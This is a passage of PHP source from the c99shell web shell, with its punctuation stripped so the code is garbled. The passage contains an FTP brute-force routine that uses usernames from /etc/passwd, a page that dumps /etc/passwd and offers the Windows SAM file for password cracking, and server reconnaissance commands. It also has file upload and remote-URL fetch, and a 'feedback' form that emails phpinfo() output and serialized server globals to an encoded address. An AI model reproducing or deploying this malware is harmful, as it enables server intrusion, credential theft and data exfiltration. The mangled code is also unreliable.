mysql_drop_db($tmpdb); comment it if you want to leave database } } } } echo tdtrtable; if ($sql_sock) { $affected = @mysql_affected_rows($sql_sock); if ((!is_numeric($affected)) or ($affected 0)){$affected = 0;} echo trtdcenterbAffected rows .$affected.centertdtr; } echo table; } if ($act == mkdir) { if ($mkdir != $d) { if (file_exists($mkdir)) {echo bMake Dir .htmlspecialchars($mkdir).b object alredy exists;} elseif (!mkdir($mkdir)) {echo bMake Dir .htmlspecialchars($mkdir).b access denied;} echo brbr; } $act = $dspact = ls; } if ($act == ftpquickbrute) { echo bFtp Quick brutebbr; if (!win) {echo This functions not work in Windows!brbr;} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$true = (!in_array($sh,array(binfalse,sbinnologin)));} else {$true = true;} if ($true) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo a href=ftp.$login..$pass.@.$host. target=_blankbConnected to .$host. with login .$login. and password .$pass.ba.br; ob_flush(); return true; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen(etcpasswd,r); if (!$fp) {echo Can't get etcpasswd for password-list.;} else { if ($fqb_logging) { if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,w);} else {$fqb_logfp = false;} $fqb_log = FTP Quick Brute (called c99shell v. .$shver.) started at .date(d.m.Y His).rnrn; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(,fgets($fp,2048)); if (c99ftpbrutecheck(localhost,21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo bConnected to .getenv(SERVER_NAME). with login .$str[0]. and password .$str[0].bbr; $fqb_log .= Connected to .getenv(SERVER_NAME). with login .$str[0]. and password .$str[0]., at .date(d.m.Y His).rn; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i $fqb_lenght) {break;} $i++; } if ($success == 0) {echo No success. connections!; $fqb_log .= No success. connections!rn;} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo hr size=1 noshadebDone!bbrTotal time (secs.) .$ftpquick_t.brTotal connections .$i.brSuccess. font color=greenb.$success.bfontbrUnsuccess..($i-$success).bbrConnects per second .round($i$ftpquick_t,2).br; $fqb_log .= rn------------------------------------------rnDone!rnTotal time (secs.) .$ftpquick_t.rnTotal connections .$i.rnSuccess. .$success.rnUnsuccess..($i-$success).rnConnects per second .round($i$ftpquick_t,2).rn; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,c99shell v. .$shver. report,$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs.c99sh_ftpquickbrute_.date(d.m.Y_H_i_s)..log; $logfile = str_replace(,DIRECTORY_SEPARATOR,$logfile); echo form action=.$surl.input type=hidden name=act value=ftpquickbrutebrRead first input type=text name=fqb_lenght value=.$nixpwdperpage.brbrUsers only with shell input type=checkbox name=fqb_onlywithsh value=1brbrLogging input type=checkbox name=fqb_logging value=1 checkedbrLogging to file input type=text name=fqb_logfile value=.$logfile. size=.(strlen($logfile)+2(strlen($logfile)10)).brLogging to e-mail input type=text name=fqb_logemail value=.$log_email. size=.(strlen($logemail)+2(strlen($logemail)10)).brbrinput type=submit name=submit value=Bruteform; } } } if ($act == d) { if (!is_dir($d)) {echo centerbPermision denied!bcenter;} else { echo bDirectory informationbtable border=0 cellspacing=1 cellpadding=2; if (!$win) { echo trtdbOwnerGroupbtdtd ; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow[name]$ow[name]fileowner($d))..($gr[name]$gr[name]filegroup($d)); } echo trtdbPermsbtdtda href=.$surl.act=chmod&d=.urlencode($d).b.view_perms_color($d).batrtdbCreate timebtdtd .date(dmY His,filectime($d)).tdtrtrtdbAccess timebtdtd .date(dmY His,fileatime($d)).tdtrtrtdbMODIFY timebtdtd .date(dmY His,filemtime($d)).tdtrtablebr; } } if ($act == phpinfo) {@ob_clean(); phpinfo(); c99shexit();} if ($act == security) { echo centerbServer security informationbcenterbOpen base dir .$hopenbasedir.bbr; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo bnix etcpasswdbbr; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo form action=.$surl.input type=hidden name=act value=securityinput type=hidden name=nixpasswd value=1bFromb input type=text= name=nixpwd_s value=.$nixpwd_s. bTob input type=text name=nixpwd_e value=.$nixpwd_e. input type=submit value=Viewformbr; $i = $nixpwd_s; while ($i $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid[dir] = a href=.$surl.act=ls&d=.urlencode($uid[dir])..$uid[dir].a; echo join(,$uid).br; } $i++; } } else {echo bra href=.$surl.act=security&nixpasswd=1&d=.$ud.buGet etcpasswdubabr;} } else { $v = $_SERVER[WINDIR].repairsam; if (file_get_contents($v)) {echo bfont color=redYou can't crack winnt passwords(.$v.) fontbbr;} else {echo bfont color=greenYou can crack winnt passwords. a href=.$surl.act=f&f=sam&d=.$_SERVER[WINDIR].repair&ft=downloadubDownloadbua, and use lcp.crack+ ©.fontbbr;} } if (file_get_contents(etcuserdomains)) {echo bfont color=greena href=.$surl.act=f&f=userdomains&d=.urlencode(etc).&ft=txtubView cpanel user-domains logsbuafontbbr;} if (file_get_contents(varcpanelaccounting.log)) {echo bfont color=greena href=.$surl.act=f&f=accounting.log&d=.urlencode(varcpanel).&ft=txtubView cpanel logsbuafontbbr;} if (file_get_contents(usrlocalapacheconfhttpd.conf)) {echo bfont color=greena href=.$surl.act=f&f=httpd.conf&d=.urlencode(usrlocalapacheconf).&ft=txtubApache configuration (httpd.conf)buafontbbr;} if (file_get_contents(etchttpd.conf)) {echo bfont color=greena href=.$surl.act=f&f=httpd.conf&d=.urlencode(etc).&ft=txtubApache configuration (httpd.conf)buafontbbr;} if (file_get_contents(etcsyslog.conf)) {echo bfont color=greena href=.$surl.act=f&f=syslog.conf&d=.urlencode(etc).&ft=txtubSyslog configuration (syslog.conf)buafontbbr;} if (file_get_contents(etcmotd)) {echo bfont color=greena href=.$surl.act=f&f=motd&d=.urlencode(etc).&ft=txtubMessage Of The Daybuafontbbr;} if (file_get_contents(etchosts)) {echo bfont color=greena href=.$surl.act=f&f=hosts&d=.urlencode(etc).&ft=txtubHostsbuafontbbr;} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = b.$name. - b;} echo $name.nl2br($value).br;}} displaysecinfo(OS Version,myshellexec(cat procversion)); displaysecinfo(Kernel version,myshellexec(sysctl -a grep version)); displaysecinfo(Distrib name,myshellexec(cat etcissue.net)); displaysecinfo(Distrib name (2),myshellexec(cat etc-realise)); displaysecinfo(CPU,myshellexec(cat proccpuinfo)); displaysecinfo(RAM,myshellexec(free -m)); displaysecinfo(HDD space,myshellexec(df -h)); displaysecinfo(List of Attributes,myshellexec(lsattr -a)); displaysecinfo(Mount options ,myshellexec(cat etcfstab)); displaysecinfo(Is cURL installed,myshellexec(which curl)); displaysecinfo(Is lynx installed,myshellexec(which lynx)); displaysecinfo(Is links installed,myshellexec(which links)); displaysecinfo(Is fetch installed,myshellexec(which fetch)); displaysecinfo(Is GET installed,myshellexec(which GET)); displaysecinfo(Is perl installed,myshellexec(which perl)); displaysecinfo(Where is apache,myshellexec(whereis apache)); displaysecinfo(Where is perl,myshellexec(whereis perl)); displaysecinfo(locate proftpd.conf,myshellexec(locate proftpd.conf)); displaysecinfo(locate httpd.conf,myshellexec(locate httpd.conf)); displaysecinfo(locate my.conf,myshellexec(locate my.conf)); displaysecinfo(locate psybnc.conf,myshellexec(locate psybnc.conf)); } if ($act == mkfile) { if ($mkfile != $d) { if (file_exists($mkfile)) {echo bMake File .htmlspecialchars($mkfile).b object alredy exists;} elseif (!fopen($mkfile,w)) {echo bMake File .htmlspecialchars($mkfile).b access denied;} else {$act = f; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = ls;} } if ($act == encoder) { echo scriptfunction set_encoder_input(text) {document.forms.encoder.input.value = text;}scriptcenterbEncoderbcenterform name=encoder action=.$surl. method=POSTinput type=hidden name=act value=encoderbInputbcentertextarea name=encoder_input id=input cols=50 rows=5.@htmlspecialchars($encoder_input).textareabrbrinput type=submit value=calculatebrbrcenterbHashesbbrcenter; foreach(array(md5,crypt,sha1,crc32) as $v) { echo $v. - input type=text size=50 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=.$v($encoder_input). readonlybr; } echo centerbUrlbcenterbrurlencode - input type=text size=35 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=.urlencode($encoder_input). readonly brurldecode - input type=text size=35 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=.htmlspecialchars(urldecode($encoder_input)). readonly brcenterbBase64bcenterbase64_encode - input type=text size=35 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=.base64_encode($encoder_input). readonlycenter; echo centerbase64_decode - ; if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo input type=text size=35 value=failed disabled readonly;} else { $debase64 = base64_decode($encoder_input); $debase64 = str_replace(0,[0],$debase64); $a = explode(rn,$debase64); $rows = count($a); $debase64 = htmlspecialchars($debase64); if ($rows == 1) {echo input type=text size=35 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=.$debase64. id=debase64 readonly;} else {$rows++; echo textarea cols=40 rows=.$rows. onFocus=this.select() onMouseover=this.select() onMouseout=this.select() id=debase64 readonly.$debase64.textarea;} echo  a href=# onclick=set_encoder_input(document.forms.encoder.debase64.value)b^ba; } echo centerbrbBase convertationsbcenterdec2hex - input type=text size=35 onFocus=this.select() onMouseover=this.select() onMouseout=this.select() value=; $c = strlen($encoder_input); for($i=0;$i$c;$i++) { $hex = dechex(ord($encoder_input[$i])); if ($encoder_input[$i] == &) {echo $encoder_input[$i];} elseif ($encoder_input[$i] != ) {echo %.$hex;} } echo readonlybrcenterform; } if ($act == fsbuff) { $arr_copy = $sess_data[copy]; $arr_cut = $sess_data[cut]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo centerbBuffer is empty!bcenter;} else {echo bFile-System bufferbbrbr; $ls_arr = $arr; $disp_fullpath = true; $act = ls;} } if ($act == selfremove) { if (($submit == $rndcode) and ($submit != )) { if (unlink(__FILE__)) {@ob_clean(); echo Thanks for using c99shell v..$shver.!; c99shexit(); } else {echo centerbCan't delete .__FILE__.!bcenter;} } else { if (!empty($rndcode)) {echo bError incorrect confimation!b;} $rnd = rand(0,9).rand(0,9).rand(0,9); echo form action=.$surl.input type=hidden name=act value=selfremovebSelf-remove .__FILE__. brbAre you surebrFor confirmation, enter .$rnd.b input type=hidden name=rndcode value=.$rnd.input type=text name=submit input type=submit value=YESform; } } if ($act == update) {$ret = c99sh_getupdate(!!$confirmupdate); echo b.$ret.b; if (stristr($ret,new version)) {echo brbrinput type=button onclick=location.href='.$surl.act=update&confirmupdate=1'; value=Update now;}} if ($act == feedback) { $suppmail = base64_decode(Yzk5c2hlbGxAY2N0ZWFtLnJ1); if (!empty($submit)) { $ticket = substr(md5(microtime()+rand(1,1000)),0,6); $body = c99shell v..$shver. feedback #.$ticket.nName .htmlspecialchars($fdbk_name).nE-mail .htmlspecialchars($fdbk_email).nMessagen.htmlspecialchars($fdbk_body).nnIP .$REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= n.phpinfo() .$phpinfo.n.$GLOBALS=.base64_encode(serialize($GLOBALS)).n; } mail($suppmail,c99shell v..$shver. feedback #.$ticket,$body,FROM .$suppmail); echo centerbThanks for your feedback! Your ticket ID .$ticket..bcenter; } else {echo form action=.$surl. method=POSTinput type=hidden name=act value=feedbackbFeedback or report bug (.str_replace(array(@,.),array([at],[dot]),$suppmail).)brbrYour name input type=text name=fdbk_name value=.htmlspecialchars($fdbk_name).brbrYour e-mail input type=text name=fdbk_email value=.htmlspecialchars($fdbk_email).brbrMessagebrtextarea name=fdbk_body cols=80 rows=10.htmlspecialchars($fdbk_body).textareainput type=hidden name=fdbk_ref value=.urlencode($HTTP_REFERER).brbrAttach server-info input type=checkbox name=fdbk_servinf value=1 checkedbrbrThere are no checking in the form.brbr - strongly recommended, if you report bug, because we need it for bug-fix.brbrWe understand languages English, Russian.brbrinput type=submit name=submit value=Sendform;} } if ($act == search) { echo bSearch in file-systembbr; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = (.); $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( name=$search_name, name_regexp=$search_name_regexp, text=$search_text, text_regexp=$search_text_regxp, text_wwo=$search_text_wwo, text_cs=$search_text_cs, text_not=$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(;,$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo bNo files found!b;} else { $ls_arr = $found; $disp_fullpath = true; $act = ls; } } echo form method=POST input type=hidden name=d value=.$dispd.input type=hidden name=act value=.$dspact. bSearch for (filefolder name) binput type=text name=search_name size=.round(strlen($search_name)+25). value=.htmlspecialchars($search_name). input type=checkbox name=search_name_regexp value=1 .($search_name_regexp == 1 checked). - regexp brbSearch in (explode ;) binput type=text name=search_in size=.round(strlen($search_in)+25). value=.htmlspecialchars($search_in). brbrbTextbbrtextarea name=search_text cols=122 rows=10.htmlspecialchars($search_text).textarea brbrinput type=checkbox name=search_text_regexp value=1 .($search_text_regexp == 1 checked). - regexp   input type=checkbox name=search_text_wwo value=1 .($search_text_wwo == 1 checked). - uwuhole words only   input type=checkbox name=search_text_cs value=1 .($search_text_cs == 1 checked). - casueu sensitive   input type=checkbox name=search_text_not value=1 .($search_text_not == 1 checked). - find files uNOTu containing the text brbrinput type=submit name=submit value=Searchform; if ($act == ls) {$dspact = $act; echo hr size=1 noshadebSearch took .$searchtime. secs (.$search_i_f. files and .$search_i_d. folders, .round(($search_i_f+$search_i_d)$searchtime,4). objects per second).bbrbr;} } if ($act == chmod) { $mode = fileperms($d.$f); if (!$mode) {echo bChange file-mode with errorb can't get current value.;} else { $form = true; if ($chmod_submit) { $octet = 0.base_convert(($chmod_o[r]10).($chmod_o[w]10).($chmod_o[x]10).($chmod_g[r]10).($chmod_g[w]10).($chmod_g[x]10).($chmod_w[r]10).($chmod_w[w]10).($chmod_w[x]10),2,8); if (chmod($d.$f,$octet)) {$act = ls; $form = false; $err = ;} else {$err = Can't chmod to .$octet..;} } if ($form) { $perms = parse_perms($mode); echo bChanging file-mode (.$d.$f.), .view_perms_color($d.$f). (.substr(decoct(fileperms($d.$f)),-4,4).)bbr.($errbErrorb .$err).form action=.$surl. method=POSTinput type=hidden name=d value=.htmlspecialchars($d).input type=hidden name=f value=.htmlspecialchars($f).input type=hidden name=act value=chmodtable align=left width=300 border=0 cellspacing=0 cellpadding=5trtdbOwnerbbrbrinput type=checkbox NAME=chmod_o[r] value=1.($perms[o][r] checked). Readbrinput type=checkbox name=chmod_o[w] value=1.($perms[o][w] checked). Writebrinput type=checkbox NAME=chmod_o[x] value=1.($perms[o][x] checked).eXecutetdtdbGroupbbrbrinput type=checkbox NAME=chmod_g[r] value=1.($perms[g][r] checked). Readbrinput type=checkbox NAME=chmod_g[w] value=1.($perms[g][w] checked). Writebrinput type=checkbox NAME=chmod_g[x] value=1.($perms[g][x] checked).eXecutefonttdtdbWorldbbrbrinput type=checkbox NAME=chmod_w[r] value=1.($perms[w][r] checked). Readbrinput type=checkbox NAME=chmod_w[w] value=1.($perms[w][w] checked). Writebrinput type=checkbox NAME=chmod_w[x] value=1.($perms[w][x] checked).eXecutefonttdtrtrtdinput type=submit name=chmod_submit value=Savetdtrtableform; } } } if ($act == upload) { $uploadmess = ; $uploadpath = str_replace(,DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != ) {$uploadpath .= ;} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES[uploadfile]; if (!empty($uploadfile[tmp_name])) { if (empty($uploadfilename)) {$destin = $uploadfile[name];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= Error uploading file .$uploadfile[name]. (can't copy .$uploadfile[tmp_name]. to .$uploadpath.$destin.!br;} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode(,$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ; while(file_exists($uploadpath.$destin)) {if ($i 0) {$b = _.$i;} $destin = index.$b..html; $i++;}} } if ((!eregi(http,$uploadurl)) and (!eregi(https,$uploadurl)) and (!eregi(ftp,$uploadurl))) {echo bIncorect url!bbr;} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= Can't download file!br;} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,w); if (!$fp) {$uploadmess .= Error writing to file .htmlspecialchars($destin).!br;} else { fwrite($fp,$content,strlen($content));